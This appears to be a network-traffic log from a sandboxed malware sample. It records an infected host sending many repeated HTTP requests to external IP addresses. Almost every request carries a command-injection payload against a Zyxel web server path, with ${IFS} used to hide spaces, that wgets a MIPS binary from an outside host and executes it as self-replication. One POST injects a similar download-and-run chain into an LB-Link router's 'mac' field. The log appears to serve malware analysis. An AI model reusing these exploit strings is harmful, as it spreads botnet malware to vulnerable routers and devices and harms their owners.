                                                Jan 28, 2024 10:16:18.706830025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2841192.168.2.233427681.117.200.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706845999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2842192.168.2.2332952145.114.116.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706887960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2843192.168.2.234780477.84.235.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706907034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2844192.168.2.2350652150.115.111.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706949949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2845192.168.2.2344118136.223.159.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706959963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2846192.168.2.2359594185.199.197.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706995010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2847192.168.2.2333286212.255.81.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.706994057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2848192.168.2.233618863.91.156.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707027912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2849192.168.2.2334864125.46.104.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707060099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2850192.168.2.235335038.137.157.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707110882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2851192.168.2.234937099.100.69.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707134008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2852192.168.2.233706442.99.170.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707165003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2853192.168.2.234996890.145.34.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707182884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2854192.168.2.2335528161.251.154.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707201004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2855192.168.2.2342130167.31.104.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707242012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2856192.168.2.235907058.58.148.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707254887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2857192.168.2.235659267.61.150.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707283020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2858192.168.2.233881473.109.230.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.707299948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2859192.168.2.234329695.76.44.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710160017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2860192.168.2.2354062151.180.0.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710190058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2861192.168.2.2349090184.73.21.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710222006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2862192.168.2.2334348114.42.74.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710272074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2863192.168.2.2345746211.4.8.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710273027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2864192.168.2.2350068126.205.214.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710304976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2865192.168.2.234534043.88.163.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710340023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2866192.168.2.233809613.174.177.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710355997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2867192.168.2.2354828198.52.198.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710376978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2868192.168.2.2337488112.37.28.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710412979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2869192.168.2.2335126120.115.210.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710447073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2870192.168.2.2338116157.231.32.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710450888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2871192.168.2.234109832.209.28.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710479021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2872192.168.2.2337122119.167.44.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710525990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2873192.168.2.2350232108.33.23.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710550070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2874192.168.2.2354328115.123.232.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710583925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2875192.168.2.2353372209.238.13.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710612059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2876192.168.2.235725284.34.219.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.710644960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2877192.168.2.234965834.111.117.238080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.788645029 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2878192.168.2.235521082.57.192.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724610090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2879192.168.2.235777485.3.193.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724670887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2880192.168.2.233540469.7.229.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724684954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2881192.168.2.2351132197.85.110.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724725008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2882192.168.2.2348324131.35.207.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724726915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2883192.168.2.2352260212.85.181.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724782944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2884192.168.2.2341372190.146.137.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724807978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2885192.168.2.2353462111.164.108.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724828959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2886192.168.2.23580649.200.155.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724860907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2887192.168.2.234545644.78.136.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724884987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2888192.168.2.2338834110.108.39.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724911928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2889192.168.2.2340772164.2.59.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724929094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2890192.168.2.2360232103.221.99.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724944115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2891192.168.2.235416495.13.231.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.724977016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2892192.168.2.235575693.100.249.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725014925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2893192.168.2.236072696.69.97.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725030899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2894192.168.2.2353636172.136.40.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725079060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2895192.168.2.235458489.122.22.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725109100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2896192.168.2.2347582167.48.17.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725126982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2897192.168.2.235453060.232.36.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725136995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2898192.168.2.2335108185.83.180.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725159883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2899192.168.2.2352820163.117.165.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725203991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2900192.168.2.2358058153.177.51.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725256920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


